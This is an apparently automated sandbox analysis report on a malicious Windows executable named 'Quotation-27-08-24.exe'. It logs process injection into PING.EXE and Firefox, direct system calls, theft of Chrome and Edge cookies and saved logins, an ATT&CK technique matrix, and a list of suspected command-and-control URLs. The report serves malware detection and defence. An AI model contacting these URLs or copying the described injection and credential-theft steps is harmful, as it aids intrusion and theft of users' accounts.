            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F665D0 mov eax, dword ptr fs:[00000030h]4_2_00F665D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A5D0 mov eax, dword ptr fs:[00000030h]4_2_00F9A5D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A5D0 mov eax, dword ptr fs:[00000030h]4_2_00F9A5D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E5CF mov eax, dword ptr fs:[00000030h]4_2_00F9E5CF
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E5CF mov eax, dword ptr fs:[00000030h]4_2_00F9E5CF
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F845B1 mov eax, dword ptr fs:[00000030h]4_2_00F845B1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F845B1 mov eax, dword ptr fs:[00000030h]4_2_00F845B1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101A456 mov eax, dword ptr fs:[00000030h]4_2_0101A456
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE05A7 mov eax, dword ptr fs:[00000030h]4_2_00FE05A7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE05A7 mov eax, dword ptr fs:[00000030h]4_2_00FE05A7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE05A7 mov eax, dword ptr fs:[00000030h]4_2_00FE05A7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E59C mov eax, dword ptr fs:[00000030h]4_2_00F9E59C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F94588 mov eax, dword ptr fs:[00000030h]4_2_00F94588
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F62582 mov eax, dword ptr fs:[00000030h]4_2_00F62582
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F62582 mov ecx, dword ptr fs:[00000030h]4_2_00F62582
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9656A mov eax, dword ptr fs:[00000030h]4_2_00F9656A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9656A mov eax, dword ptr fs:[00000030h]4_2_00F9656A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9656A mov eax, dword ptr fs:[00000030h]4_2_00F9656A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101A49A mov eax, dword ptr fs:[00000030h]4_2_0101A49A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68550 mov eax, dword ptr fs:[00000030h]4_2_00F68550
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68550 mov eax, dword ptr fs:[00000030h]4_2_00F68550
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF6500 mov eax, dword ptr fs:[00000030h]4_2_00FF6500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE6F2 mov eax, dword ptr fs:[00000030h]4_2_00FDE6F2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE6F2 mov eax, dword ptr fs:[00000030h]4_2_00FDE6F2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE6F2 mov eax, dword ptr fs:[00000030h]4_2_00FDE6F2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE6F2 mov eax, dword ptr fs:[00000030h]4_2_00FDE6F2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE06F1 mov eax, dword ptr fs:[00000030h]4_2_00FE06F1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE06F1 mov eax, dword ptr fs:[00000030h]4_2_00FE06F1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Memory written: C:\Users\user\Desktop\Quotation-27-08-24.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Section loaded: NULL target: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Section loaded: NULL target: C:\Windows\SysWOW64\PING.EXE protection: execute and read and write
            Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: NULL target: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe protection: read write
            Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: NULL target: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\PING.EXE | Thread register set: target process: 3884
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Process created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Process created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe | Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: C:\Windows\SysWOW64\PING.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: uExImirYECsTjI.exe, 00000008.00000002.4569133149.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000000.2396087697.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
            Source: uExImirYECsTjI.exe, 00000008.00000002.4569133149.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000000.2396087697.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: uExImirYECsTjI.exe, 00000008.00000002.4569133149.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000000.2396087697.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: uExImirYECsTjI.exe, 00000008.00000002.4569133149.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000000.2396087697.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Queries volume information: C:\Users\user\Desktop\Quotation-27-08-24.exe VolumeInformation
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\PING.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | 113 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            [Figure: Behavior Graph, ID: 1499588, Sample: Quotation-27-08-24.exe, Startdate: 27/08/2024, Architecture: WINDOWS, Score: 100. Process chain: Quotation-27-08-24.exe (started) -> Quotation-27-08-24.exe (started) -> uExImirYECsTjI.exe (injected) -> PING.EXE (started) -> firefox.exe (started)]

            Source | Detection | Scanner | Label
            Quotation-27-08-24.exe | 33% | Virustotal |
            Quotation-27-08-24.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
                                        unknown
                                        http://www.indeks.space/mjy7/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.healthsolutions.top/p2w8/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.cs0724sd92jj.cloud/dk4s/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sorriragora.online/4jqu/?mvjDMBx8=7Y4E7U2NZPWflm9zHmqMqimi+5VuLrMg6kjCj1EInif9PGb3NGzDdsXjsV7gO/0L54/q7blUjcSlxFaP/BkUPUPxQ1br5RU9Wx45qk4zaFXeqdDODb3rhKjRzSvczwWVhnNF6PY=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.stolex.top/kunq/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.cchelvn.shop/q1r7/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.kontorpaneli.xyz/pziu/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=EY+qgcjcqEvJaY+ALfwoPip36wdjh3xsdSy6XMjMfPv/Ir5Xz5+nGIw7jjJwblfp8IgSbQk1nTysBGMjrt/hxs8d+JiTcx1VzVYwtbha6lbR616oEW2vuE+H/qKkyJ7RSqcP4eo=true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sorriragora.online/4jqu/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.adindadisini15.click/vufj/?mvjDMBx8=+HD5AwEaNmB+2iuNGAXu8ZEboMIZq6yiRKp9PVW508Es4ofR/Ro4n6j7lKcu3Nlg5pjwPTuirHLo0Y+yTcgc2ol0tGxsrzJn3Qwp0zn1So0PhkHXRjdNu1v/OX+x6wvNfDHKpos=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.globyglen.info/76oh/?mvjDMBx8=bkikPFO0y+dZ8FJVAZCFc8SLSjnSdRJGJM46ftFXLQOb8YZCjaJwx2qDHjBW5y2pzyppecjshIN6jiWBoFnF0mIbwCR4LMrqk0QV5plBln1dX3G3XbOh6jVBwPa42yOCsK/pJQQ=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.techcables.shop/0hup/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.personal-loans-jp8.xyz/osae/?mvjDMBx8=ajGs1OnhgmOjGH0rS1+XMzuDhBRwUFVs9ujDJ3TY3TM9Xr/glBZes+ajendbW/hUbvaGBM0AJFcTAGb0Z858EyBkLc9l3gETAt5Zd72AqHMe/3ljZLi/M9TCgc1RD8Nq02402TA=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.gate-eight.net/zbwq/?mvjDMBx8=yiu0kyrMDZDnaGSHUN6l2/AWenBEPojQbvIrsSiIoULw3Ja/Kxh4uhHPf3lVqybB3F8SgOCipbonbrybGxTRaMG4SCnpngzzUdFAxyNhxQ0Fwwko6x3YD+nfuTkI7r5rP6BNPZw=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        unknown
                                        Name | Source | Malicious | Antivirus Detection | Reputation
                                        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1499588
                                        Start date and time:2024-08-27 08:40:10 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 11m 5s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Quotation-27-08-24.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@9/2@15/14
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 96%
                                        • Number of executed functions: 199
                                        • Number of non-executed functions: 297
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
